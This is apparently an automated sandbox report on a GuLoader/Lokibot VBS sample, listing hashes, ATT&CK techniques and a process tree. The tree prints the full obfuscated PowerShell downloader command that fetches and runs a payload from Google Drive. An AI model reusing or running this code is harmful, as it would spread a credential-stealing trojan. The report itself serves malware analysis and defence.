guloader | 983e0421cd309bd8732a52aa652720cfb796b11e61f3bf4ba0db1fe405b82a92

General

Target

983e0421cd309bd8732a52aa652720cfb796b11e61f3bf4ba0db1fe405b82a92.vbs
Size

41KB
MD5

a9e7ff05c4fa8bf06479b824d0340b42
SHA1

73f218ddf92c79fce8c09638501a7610ffa6d650
SHA256

983e0421cd309bd8732a52aa652720cfb796b11e61f3bf4ba0db1fe405b82a92
SHA512

f42991287e5b395549ea8f65cbcb7747607fdd1550433c494a10d291c9aa1960e6907db08ecc6a8dfacaf3aded63d654268c1e2fee21984c74a591256970e8cd
SSDEEP

384:Z9vOg30sUqXgcAT0179dzJTAtKdkWIinkc0MyXgve7r87qUF8S09:Zp30wgcAAZ/zQxf/rYG

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2680	powershell.exe
5	2680	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe
2332	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
7	drive.google.com
2	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1632	wabmig.exe
1632	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2332	powershell.exe
1632	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2332 set thread context of 1632	2332	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2332	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2680	powershell.exe
2332	powershell.exe
2332	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2332	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	1632	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2788 wrote to memory of 2680	2788	WScript.exe	31
PID 2788 wrote to memory of 2680	2788	WScript.exe	31
PID 2788 wrote to memory of 2680	2788	WScript.exe	31
PID 2680 wrote to memory of 2692	2680	powershell.exe	33
PID 2680 wrote to memory of 2692	2680	powershell.exe	33
PID 2680 wrote to memory of 2692	2680	powershell.exe	33
PID 2680 wrote to memory of 1412	2680	powershell.exe	35
PID 2680 wrote to memory of 1412	2680	powershell.exe	35
PID 2680 wrote to memory of 1412	2680	powershell.exe	35
PID 1412 wrote to memory of 2332	1412	cmd.exe	36
PID 1412 wrote to memory of 2332	1412	cmd.exe	36
PID 1412 wrote to memory of 2332	1412	cmd.exe	36
PID 1412 wrote to memory of 2332	1412	cmd.exe	36
PID 2332 wrote to memory of 1096	2332	powershell.exe	37
PID 2332 wrote to memory of 1096	2332	powershell.exe	37
PID 2332 wrote to memory of 1096	2332	powershell.exe	37
PID 2332 wrote to memory of 1096	2332	powershell.exe	37
PID 2332 wrote to memory of 1632	2332	powershell.exe	38
PID 2332 wrote to memory of 1632	2332	powershell.exe	38
PID 2332 wrote to memory of 1632	2332	powershell.exe	38
PID 2332 wrote to memory of 1632	2332	powershell.exe	38
PID 2332 wrote to memory of 1632	2332	powershell.exe	38
PID 2332 wrote to memory of 1632	2332	powershell.exe	38

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\983e0421cd309bd8732a52aa652720cfb796b11e61f3bf4ba0db1fe405b82a92.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Festivalfolket Provaccination skydeprammens Vinterleg #>;$Pliosaurus='Kneppede';<#Kvabtorsk Fremholdes Programmelkonstruktionen Florate Fantomers #>;$Adilss=$host.PrivateData;If ($Adilss) {$Macabreness++;}function Teleskopaffjedringer($Varmefordeling){$Brittles=$Varmefordeling.Length-$Macabreness;for( $Unspottable27=5;$Unspottable27 -lt $Brittles;$Unspottable27+=6){$Middelstanden+=$Varmefordeling[$Unspottable27];}$Middelstanden;}function Pedologic59($Bordellets){ & ($Epaulement) ($Bordellets);}$Kootchar=Teleskopaffjedringer 'RoyalMBer roB gumzPa,beiOranglVejl lVer ea Fabu/,etta5Mi si.sv,ke0Germi Fiske(Me hhWBibliiSneginHep.tdKa,apo TeakwupbowsSmoot StrbeN Em tTHyste Sv.ne1Skvad0Sta e. Pred0C,unt;D,odo bedgoWTax ki .yponPreco6Ru.ds4Jacul; Dron enbrxOmpla6Tea t4 a vn;Recom photorOp ylvRemis:Jager1Asyll2Futur1 xuv.Bortf0F rur)Afi.e OvergGGrandeskar.cPyralk TungoMater/Lde v2Backw0 Yuga1tykbu0He.te0 Hen.1Aller0Snowb1Pos.e andsFUnp siBnnemr P rleHulebfGeneaoSvrmex ntab/Accen1 Skyf2Weiss1Di lo. Bulk0 Hype ';$Guamuchil=Teleskopaffjedringer ' PerouVelsesMaalee Aidsr B.an- Ci eaaftesGU,streHundeNs.mmeTconsc ';$Nydannelsen=Teleskopaffjedringer 'F igrh Kam tTeleft An cpInfrasHejse:Rafle/Trak./concadB sonrCart,iinterv,oeree Refl.ResmegKokseoDestioObliggVirksl for,eGallo.Indsic Eso oKri imFran / SlbeuAntikcHafiz?Downse.bbesx AdnepQuai o orkrOutkntla un=Transdunge o.otogwstudinPraeslProsaoProsaaUnderdSwitc&Polygi steddHoyma= A ar1Trag lPla.utM sapO Act 5Alm.nCParge6Pauc,bMummeY SkroYUnpersDecla8a ignTKampuCAj gapAfson3 LentGUdeliUH demv erh5meta rReo,sTPrjs - estIHavnel P antangriSForan2 AleyyUntrum TranqFostewG,dseD etss ';$Sagsgte=Teleskopaffjedringer 'Bolsh>Outki ';$Epaulement=Teleskopaffjedringer 'GalliIdob eeUnderXcrani ';$hexastich='Enneateric';$Lecithinase = Teleskopaffjedringer 'TophueUnvocc GloihCou aoGemin Spirk%NyvuraCafflpSaddep dobodatom aCeromtMart aGge,u% deaf\Shum.B .rnea Med r.ladrdT lereP onehGallov Mu la acralHj ta.RinsaEUndernTeleszTran, Print& igfo&Chis LagereFodhvcMiasmhAp reoMikro l tet agg ';Pedologic59 (Teleskopaffjedringer 'Misdi$Ris egStolpl lukooImmi bPha aa redel Stra: tetBTransaGen ra FirmnGendad gokklTrkulgUnnergFinineGouarlCaldesEstope Ud a=F rve(HypotcPro tm ,ercd U et homp/ CraccItchw Hayco$ BoskL tofmeFuldbcBermmiUlotrtMicrohOvermiAmazonJawboaLymphsDrifteNedhu)Cl.pi ');Pedologic59 (Teleskopaffjedringer 'Kortb$Rose.gAttaclSynapoRetslbLi gyaSg.scl Imd.:SparkTPlausoJacksl.anskvfladeaHants=Bir,h$Na teNRefecyM ssadskydeaRingen Une,n RumteSt.rtlFerresMultieMo.alnTvang. PiblsMajsep Fin.lHolteimetactMuse (Verde$EfterSArchdaLithog nbuns quadgQuotatRoutie Xy o) Syst ');Pedologic59 (Teleskopaffjedringer 'Vrdie[ rftcNGlimdeRetrotC ivy.TopuiSscuffeImmatruskylv AnisiAlm ncPseudeBlaspPMixtuoIndgaiTotorn onnet DagbMRundta.ossinPseudaSliveg vume remr Un r]Apida:J,sti:,edjuSDyrsse CliqcvindmuHyrd r Trk,i ForstUnderyUnstoPBal.rrNed,koHel et BibloT,poac addoTaansl,onow Hj mm=Flau, Speak[ orsmNLser ecentrtOve,m.SkrmmSFunkte GunpcA.roauSlaverHjreciCa.kytB lloyAmaraP Mod,rSpedioBaan tScotooDatomcGrsseo D nilPaabuTUnp.myFolkepK ogleBrand]Under:Konse:O,asiTmortrlTurnbs ebra1pseud2 Amts ');$Nydannelsen=$Tolva[0];$Bengnaveres= (Teleskopaffjedringer ' Meth$QuantGMinorLB,llsOOverpBIdylla Sp rLEksp :OmrysCPosthlHovedAAfhasnDiploLTripae AnemsPeppiSHudo =PathoNFortjE ExtrwJulel-PrecoOBddelBGinnej fiduETarifCPleniTSangu skrivsTaarnyFlyttSSti nTA ailETamboMOv rw. DruknFjumreErgott.oved.Ner eWFininEGeolobVbnencPoetilVerdeiMaskie Ha.snIndkot');$Bengnaveres+=$Baandlggelse[1];Pedologic59 ($Bengnaveres);Pedologic59 (Teleskopaffjedringer 'Aktiv$Bio eC irculFortraRobinnBrestl Buffe Beh.sF.skesExost.PretrHStille DeepaSlut dAranee ynanrHiplispostv[ Ther$RefelGPopkouSun haRoudkmGymnouSp jtcAsp rhGra diFreellHurdl] larm=Fr sc$prcisK ErgooAr,aloBalnet flejcun ouhRadioa VelsrBgesp ');$Scrammed=Teleskopaffjedringer 'Bicar$Sonn,CP,oevlTer eaOpgr.n WonglGravre DamssSinlesRstis. t ivDHype oNudiswOmhygnHaplolafsliochestaUnjuddNeuraF limico ntlDiskeeSakra(Dep h$Ther NPestey egasd ExtraCharln AfrunAmathe FishlBrochsGnathe.permnParti, A li$Po,ynCRowlohAmat aSadeln c.vaeF ngilFo.dml Vogn)Charl ';$Chanell=$Baandlggelse[0];Pedologic59 (Teleskopaffjedringer 'Un.en$IndiaGRevallK preOKo dibKamufAStereLoplri:PlantGBy.niOklimpdPericSA tritUnco.oMisadgDispoE.hana=Skole( Difftsol eENedkuSFusedTU der-Prs dPRdha AHengitG neth Roug Filre$ Att CKildehDrammARe,lun Bs eeUnf oL vikil Udpo)Rerow ');while (!$godstoge) {Pedologic59 (Teleskopaffjedringer 'Ato i$Fa tigSideal F.ueoUnt abA,abiaBai,ilUdske:FiskeKUnderaImmorf ElegfFe lte SturpPaedouAut dnDu,fac S.rahXantheTogrerprs ns lgu=Sam e$atr ctS,mphrPrediu,deryevanes ') ;Pedologic59 $Scrammed;Pedologic59 (Teleskopaffjedringer 'DramaSTopputunsinaMajusrsvenntR fle- For SBursalSekveeFakkeeCoh bpProta Bache4Bevil ');Pedologic59 (Teleskopaffjedringer 'C.uga$S,mvig tilvlAnlgsoUds.lbK.yneaSten,l.naps:ProdigUnd poKtu hdepitesB.lurtUn,rooFe ongFe,lbeAbefe= Skde(Clea T lugte HuslsCanaltSbeva-KontoPP ychaV lstt Resihlando forpl$krimiC DyrehInteraSnigsnReekseVe,telSmaallAu is)Bost ') ;Pedologic59 (Teleskopaffjedringer ' Vege$ TidsgUnexcl,egreoPu teb GrooaBr enl Hypo:,owisR AkkoeD.centYeorlsBeklasTrekay oncsc pittLympheUnfixmEnepi=Ext a$ pulegGiredl almeoemb,lbGuldmaPim,elEd ti:.cecaK,urswoHva.pnnaboftKron,rTrkkro TelelFibrifFl stu.ytjenHentekTagkatUnivaiFo teoMylden rosteStretrAcephsHjovn2Ungut3Aands0Infec+Melod+Derma%Embry$Op orT urleoMitchlMorgevEksemaHstma.DikelcKoreco DomsuSnrenno ridtStats ') ;$Nydannelsen=$Tolva[$Retssystem];}$Hovedstadsregionens=324505;$Primost=29091;Pedologic59 (Teleskopaffjedringer 'Skjor$Overgg ,pkalOver.oDecapbKvivaaSynodlKr,om:HieraSre,inuB.tsepSyreneL,engrMa temUn cqnDewladBavn sS.itt H ems=B sge Rem.sGAnd,oeAlenetKlamr- She CAppeloAperinillintFormeeHeptanpretztFeud, Prech$ OverC aubeh I.enamimesnLovpreKvalil DrowlBe ns ');Pedologic59 (Teleskopaffjedringer 'Baads$FremlgSl.efl motoo MejebNetbaaPandal Brev: CyrtBp ycha RendnTryktiOarl.sUnc kt BarseSethir St eiBol inHel iereser be bn=Bekli Si e[ VotaS RastyFo tssan.ectSvbelePlatfm Anti.AarskCFo ieo iparnA gifvRa aseTredvrOplystAltin]Lrerp:famil:Si.niFSubcrrPersoo oncamReinkBScaphaChucks,orkleSynag6Ordni4Ma emS Ny ttbrnepr DemoiS btenKonkrgSuper(barr,$K.tekStyng,u reatpSyn.aeMacadrBr scmRese.n WaffdOmgresderm,)Uphea ');Pedologic59 (Teleskopaffjedringer 'Dalle$ SagegUdartlAflaaorazzebUra,salivstl nutg:.ealiCKnepaoafskyeKotallGrn.eoNonpumL.ste U.bom=Ka,tu Sand [ TenoSEfte yBussesThorot SkyleBruttm edru.VrisnTUn.roeSterrxFullatCommu.KollaELimfanBugtacOmbrioEmeridOpkr,iB atinComebgSubsp]defat: usm:VildtAT.kmaS Ex lCSkinnI yritI atte.Emb yGNonmoeB,thltPunicSAl,entF ettrTriani HegenBifidgFestp(A dic$cur aBRheinaDec,inUngdoiSexbosLiegetKal ieA.drarFabriistueanoplggeFo.an) tand ');Pedologic59 (Teleskopaffjedringer 'fores$ Uni.gKabellComicoR furb ZagraGl rilE cip:RumenHTalriuInconlTromphHobroeBagerdmidpoe.rdspn Im es erm= Puna$UnfraCVisseoTalleeAtroflk,mbioToro m M,nu.Uncons olyu Forsb Ti.hsSt ertS.bstrMistriKanonn En.ogtelep(Ansva$To.awHKonomoD agovLegateratepdSacchsFil,btundera Skuldindics MaiorH.llee Evn,gKvartiKllino o.ernGasflePlantnGlazisEnep.,Locom$ Udd P ngdorLatriiCeltom ennoC.ntrs sedrtKrigs)Wed l ');Pedologic59 $Hulhedens;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bardehval.Enz && echo t"
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Festivalfolket Provaccination skydeprammens Vinterleg #>;$Pliosaurus='Kneppede';<#Kvabtorsk Fremholdes Programmelkonstruktionen Florate Fantomers #>;$Adilss=$host.PrivateData;If ($Adilss) {$Macabreness++;}function Teleskopaffjedringer($Varmefordeling){$Brittles=$Varmefordeling.Length-$Macabreness;for( $Unspottable27=5;$Unspottable27 -lt $Brittles;$Unspottable27+=6){$Middelstanden+=$Varmefordeling[$Unspottable27];}$Middelstanden;}function Pedologic59($Bordellets){ & ($Epaulement) ($Bordellets);}$Kootchar=Teleskopaffjedringer 'RoyalMBer roB gumzPa,beiOranglVejl lVer ea Fabu/,etta5Mi si.sv,ke0Germi Fiske(Me hhWBibliiSneginHep.tdKa,apo TeakwupbowsSmoot StrbeN Em tTHyste Sv.ne1Skvad0Sta e. Pred0C,unt;D,odo bedgoWTax ki .yponPreco6Ru.ds4Jacul; Dron enbrxOmpla6Tea t4 a vn;Recom photorOp ylvRemis:Jager1Asyll2Futur1 xuv.Bortf0F rur)Afi.e OvergGGrandeskar.cPyralk TungoMater/Lde v2Backw0 Yuga1tykbu0He.te0 Hen.1Aller0Snowb1Pos.e andsFUnp siBnnemr P rleHulebfGeneaoSvrmex ntab/Accen1 Skyf2Weiss1Di lo. Bulk0 Hype ';$Guamuchil=Teleskopaffjedringer ' PerouVelsesMaalee Aidsr B.an- Ci eaaftesGU,streHundeNs.mmeTconsc ';$Nydannelsen=Teleskopaffjedringer 'F igrh Kam tTeleft An cpInfrasHejse:Rafle/Trak./concadB sonrCart,iinterv,oeree Refl.ResmegKokseoDestioObliggVirksl for,eGallo.Indsic Eso oKri imFran / SlbeuAntikcHafiz?Downse.bbesx AdnepQuai o orkrOutkntla un=Transdunge o.otogwstudinPraeslProsaoProsaaUnderdSwitc&Polygi steddHoyma= A ar1Trag lPla.utM sapO Act 5Alm.nCParge6Pauc,bMummeY SkroYUnpersDecla8a ignTKampuCAj gapAfson3 LentGUdeliUH demv erh5meta rReo,sTPrjs - estIHavnel P antangriSForan2 AleyyUntrum TranqFostewG,dseD etss ';$Sagsgte=Teleskopaffjedringer 'Bolsh>Outki ';$Epaulement=Teleskopaffjedringer 'GalliIdob eeUnderXcrani ';$hexastich='Enneateric';$Lecithinase = Teleskopaffjedringer 'TophueUnvocc GloihCou aoGemin Spirk%NyvuraCafflpSaddep dobodatom aCeromtMart aGge,u% deaf\Shum.B .rnea Med r.ladrdT lereP onehGallov Mu la acralHj ta.RinsaEUndernTeleszTran, Print& igfo&Chis LagereFodhvcMiasmhAp reoMikro l tet agg ';Pedologic59 (Teleskopaffjedringer 'Misdi$Ris egStolpl lukooImmi bPha aa redel Stra: tetBTransaGen ra FirmnGendad gokklTrkulgUnnergFinineGouarlCaldesEstope Ud a=F rve(HypotcPro tm ,ercd U et homp/ CraccItchw Hayco$ BoskL tofmeFuldbcBermmiUlotrtMicrohOvermiAmazonJawboaLymphsDrifteNedhu)Cl.pi ');Pedologic59 (Teleskopaffjedringer 'Kortb$Rose.gAttaclSynapoRetslbLi gyaSg.scl Imd.:SparkTPlausoJacksl.anskvfladeaHants=Bir,h$Na teNRefecyM ssadskydeaRingen Une,n RumteSt.rtlFerresMultieMo.alnTvang. PiblsMajsep Fin.lHolteimetactMuse (Verde$EfterSArchdaLithog nbuns quadgQuotatRoutie Xy o) Syst ');Pedologic59 (Teleskopaffjedringer 'Vrdie[ rftcNGlimdeRetrotC ivy.TopuiSscuffeImmatruskylv AnisiAlm ncPseudeBlaspPMixtuoIndgaiTotorn onnet DagbMRundta.ossinPseudaSliveg vume remr Un r]Apida:J,sti:,edjuSDyrsse CliqcvindmuHyrd r Trk,i ForstUnderyUnstoPBal.rrNed,koHel et BibloT,poac addoTaansl,onow Hj mm=Flau, Speak[ orsmNLser ecentrtOve,m.SkrmmSFunkte GunpcA.roauSlaverHjreciCa.kytB lloyAmaraP Mod,rSpedioBaan tScotooDatomcGrsseo D nilPaabuTUnp.myFolkepK ogleBrand]Under:Konse:O,asiTmortrlTurnbs ebra1pseud2 Amts ');$Nydannelsen=$Tolva[0];$Bengnaveres= (Teleskopaffjedringer ' Meth$QuantGMinorLB,llsOOverpBIdylla Sp rLEksp :OmrysCPosthlHovedAAfhasnDiploLTripae AnemsPeppiSHudo =PathoNFortjE ExtrwJulel-PrecoOBddelBGinnej fiduETarifCPleniTSangu skrivsTaarnyFlyttSSti nTA ailETamboMOv rw. DruknFjumreErgott.oved.Ner eWFininEGeolobVbnencPoetilVerdeiMaskie Ha.snIndkot');$Bengnaveres+=$Baandlggelse[1];Pedologic59 ($Bengnaveres);Pedologic59 (Teleskopaffjedringer 'Aktiv$Bio eC irculFortraRobinnBrestl Buffe Beh.sF.skesExost.PretrHStille DeepaSlut dAranee ynanrHiplispostv[ Ther$RefelGPopkouSun haRoudkmGymnouSp jtcAsp rhGra diFreellHurdl] larm=Fr sc$prcisK ErgooAr,aloBalnet flejcun ouhRadioa VelsrBgesp ');$Scrammed=Teleskopaffjedringer 'Bicar$Sonn,CP,oevlTer eaOpgr.n WonglGravre DamssSinlesRstis. t ivDHype oNudiswOmhygnHaplolafsliochestaUnjuddNeuraF limico ntlDiskeeSakra(Dep h$Ther NPestey egasd ExtraCharln AfrunAmathe FishlBrochsGnathe.permnParti, A li$Po,ynCRowlohAmat aSadeln c.vaeF ngilFo.dml Vogn)Charl ';$Chanell=$Baandlggelse[0];Pedologic59 (Teleskopaffjedringer 'Un.en$IndiaGRevallK preOKo dibKamufAStereLoplri:PlantGBy.niOklimpdPericSA tritUnco.oMisadgDispoE.hana=Skole( Difftsol eENedkuSFusedTU der-Prs dPRdha AHengitG neth Roug Filre$ Att CKildehDrammARe,lun Bs eeUnf oL vikil Udpo)Rerow ');while (!$godstoge) {Pedologic59 (Teleskopaffjedringer 'Ato i$Fa tigSideal F.ueoUnt abA,abiaBai,ilUdske:FiskeKUnderaImmorf ElegfFe lte SturpPaedouAut dnDu,fac S.rahXantheTogrerprs ns lgu=Sam e$atr ctS,mphrPrediu,deryevanes ') ;Pedologic59 $Scrammed;Pedologic59 (Teleskopaffjedringer 'DramaSTopputunsinaMajusrsvenntR fle- For SBursalSekveeFakkeeCoh bpProta Bache4Bevil ');Pedologic59 (Teleskopaffjedringer 'C.uga$S,mvig tilvlAnlgsoUds.lbK.yneaSten,l.naps:ProdigUnd poKtu hdepitesB.lurtUn,rooFe ongFe,lbeAbefe= Skde(Clea T lugte HuslsCanaltSbeva-KontoPP ychaV lstt Resihlando forpl$krimiC DyrehInteraSnigsnReekseVe,telSmaallAu is)Bost ') ;Pedologic59 (Teleskopaffjedringer ' Vege$ TidsgUnexcl,egreoPu teb GrooaBr enl Hypo:,owisR AkkoeD.centYeorlsBeklasTrekay oncsc pittLympheUnfixmEnepi=Ext a$ pulegGiredl almeoemb,lbGuldmaPim,elEd ti:.cecaK,urswoHva.pnnaboftKron,rTrkkro TelelFibrifFl stu.ytjenHentekTagkatUnivaiFo teoMylden rosteStretrAcephsHjovn2Ungut3Aands0Infec+Melod+Derma%Embry$Op orT urleoMitchlMorgevEksemaHstma.DikelcKoreco DomsuSnrenno ridtStats ') ;$Nydannelsen=$Tolva[$Retssystem];}$Hovedstadsregionens=324505;$Primost=29091;Pedologic59 (Teleskopaffjedringer 'Skjor$Overgg ,pkalOver.oDecapbKvivaaSynodlKr,om:HieraSre,inuB.tsepSyreneL,engrMa temUn cqnDewladBavn sS.itt H ems=B sge Rem.sGAnd,oeAlenetKlamr- She CAppeloAperinillintFormeeHeptanpretztFeud, Prech$ OverC aubeh I.enamimesnLovpreKvalil DrowlBe ns ');Pedologic59 (Teleskopaffjedringer 'Baads$FremlgSl.efl motoo MejebNetbaaPandal Brev: CyrtBp ycha RendnTryktiOarl.sUnc kt BarseSethir St eiBol inHel iereser be bn=Bekli Si e[ VotaS RastyFo tssan.ectSvbelePlatfm Anti.AarskCFo ieo iparnA gifvRa aseTredvrOplystAltin]Lrerp:famil:Si.niFSubcrrPersoo oncamReinkBScaphaChucks,orkleSynag6Ordni4Ma emS Ny ttbrnepr DemoiS btenKonkrgSuper(barr,$K.tekStyng,u reatpSyn.aeMacadrBr scmRese.n WaffdOmgresderm,)Uphea ');Pedologic59 (Teleskopaffjedringer 'Dalle$ SagegUdartlAflaaorazzebUra,salivstl nutg:.ealiCKnepaoafskyeKotallGrn.eoNonpumL.ste U.bom=Ka,tu Sand [ TenoSEfte yBussesThorot SkyleBruttm edru.VrisnTUn.roeSterrxFullatCommu.KollaELimfanBugtacOmbrioEmeridOpkr,iB atinComebgSubsp]defat: usm:VildtAT.kmaS Ex lCSkinnI yritI atte.Emb yGNonmoeB,thltPunicSAl,entF ettrTriani HegenBifidgFestp(A dic$cur aBRheinaDec,inUngdoiSexbosLiegetKal ieA.drarFabriistueanoplggeFo.an) tand ');Pedologic59 (Teleskopaffjedringer 'fores$ Uni.gKabellComicoR furb ZagraGl rilE cip:RumenHTalriuInconlTromphHobroeBagerdmidpoe.rdspn Im es erm= Puna$UnfraCVisseoTalleeAtroflk,mbioToro m M,nu.Uncons olyu Forsb Ti.hsSt ertS.bstrMistriKanonn En.ogtelep(Ansva$To.awHKonomoD agovLegateratepdSacchsFil,btundera Skuldindics MaiorH.llee Evn,gKvartiKllino o.ernGasflePlantnGlazisEnep.,Locom$ Udd P ngdorLatriiCeltom ennoC.ntrs sedrtKrigs)Wed l ');Pedologic59 $Hulhedens;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1412
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Festivalfolket Provaccination skydeprammens Vinterleg #>;$Pliosaurus='Kneppede';<#Kvabtorsk Fremholdes Programmelkonstruktionen Florate Fantomers #>;$Adilss=$host.PrivateData;If ($Adilss) {$Macabreness++;}function Teleskopaffjedringer($Varmefordeling){$Brittles=$Varmefordeling.Length-$Macabreness;for( $Unspottable27=5;$Unspottable27 -lt $Brittles;$Unspottable27+=6){$Middelstanden+=$Varmefordeling[$Unspottable27];}$Middelstanden;}function Pedologic59($Bordellets){ & ($Epaulement) ($Bordellets);}$Kootchar=Teleskopaffjedringer 'RoyalMBer roB gumzPa,beiOranglVejl lVer ea Fabu/,etta5Mi si.sv,ke0Germi Fiske(Me hhWBibliiSneginHep.tdKa,apo TeakwupbowsSmoot StrbeN Em tTHyste Sv.ne1Skvad0Sta e. Pred0C,unt;D,odo bedgoWTax ki .yponPreco6Ru.ds4Jacul; Dron enbrxOmpla6Tea t4 a vn;Recom photorOp ylvRemis:Jager1Asyll2Futur1 xuv.Bortf0F rur)Afi.e OvergGGrandeskar.cPyralk TungoMater/Lde v2Backw0 Yuga1tykbu0He.te0 Hen.1Aller0Snowb1Pos.e andsFUnp siBnnemr P rleHulebfGeneaoSvrmex ntab/Accen1 Skyf2Weiss1Di lo. Bulk0 Hype ';$Guamuchil=Teleskopaffjedringer ' PerouVelsesMaalee Aidsr B.an- Ci eaaftesGU,streHundeNs.mmeTconsc ';$Nydannelsen=Teleskopaffjedringer 'F igrh Kam tTeleft An cpInfrasHejse:Rafle/Trak./concadB sonrCart,iinterv,oeree Refl.ResmegKokseoDestioObliggVirksl for,eGallo.Indsic Eso oKri imFran / SlbeuAntikcHafiz?Downse.bbesx AdnepQuai o orkrOutkntla un=Transdunge o.otogwstudinPraeslProsaoProsaaUnderdSwitc&Polygi steddHoyma= A ar1Trag lPla.utM sapO Act 5Alm.nCParge6Pauc,bMummeY SkroYUnpersDecla8a ignTKampuCAj gapAfson3 LentGUdeliUH demv erh5meta rReo,sTPrjs - estIHavnel P antangriSForan2 AleyyUntrum TranqFostewG,dseD etss ';$Sagsgte=Teleskopaffjedringer 'Bolsh>Outki ';$Epaulement=Teleskopaffjedringer 'GalliIdob eeUnderXcrani ';$hexastich='Enneateric';$Lecithinase = Teleskopaffjedringer 'TophueUnvocc GloihCou aoGemin Spirk%NyvuraCafflpSaddep dobodatom aCeromtMart aGge,u% deaf\Shum.B .rnea Med r.ladrdT lereP onehGallov Mu la acralHj ta.RinsaEUndernTeleszTran, Print& igfo&Chis LagereFodhvcMiasmhAp reoMikro l tet agg ';Pedologic59 (Teleskopaffjedringer 'Misdi$Ris egStolpl lukooImmi bPha aa redel Stra: tetBTransaGen ra FirmnGendad gokklTrkulgUnnergFinineGouarlCaldesEstope Ud a=F rve(HypotcPro tm ,ercd U et homp/ CraccItchw Hayco$ BoskL tofmeFuldbcBermmiUlotrtMicrohOvermiAmazonJawboaLymphsDrifteNedhu)Cl.pi ');Pedologic59 (Teleskopaffjedringer 'Kortb$Rose.gAttaclSynapoRetslbLi gyaSg.scl Imd.:SparkTPlausoJacksl.anskvfladeaHants=Bir,h$Na teNRefecyM ssadskydeaRingen Une,n RumteSt.rtlFerresMultieMo.alnTvang. PiblsMajsep Fin.lHolteimetactMuse (Verde$EfterSArchdaLithog nbuns quadgQuotatRoutie Xy o) Syst ');Pedologic59 (Teleskopaffjedringer 'Vrdie[ rftcNGlimdeRetrotC ivy.TopuiSscuffeImmatruskylv AnisiAlm ncPseudeBlaspPMixtuoIndgaiTotorn onnet DagbMRundta.ossinPseudaSliveg vume remr Un r]Apida:J,sti:,edjuSDyrsse CliqcvindmuHyrd r Trk,i ForstUnderyUnstoPBal.rrNed,koHel et BibloT,poac addoTaansl,onow Hj mm=Flau, Speak[ orsmNLser ecentrtOve,m.SkrmmSFunkte GunpcA.roauSlaverHjreciCa.kytB lloyAmaraP Mod,rSpedioBaan tScotooDatomcGrsseo D nilPaabuTUnp.myFolkepK ogleBrand]Under:Konse:O,asiTmortrlTurnbs ebra1pseud2 Amts ');$Nydannelsen=$Tolva[0];$Bengnaveres= (Teleskopaffjedringer ' Meth$QuantGMinorLB,llsOOverpBIdylla Sp rLEksp 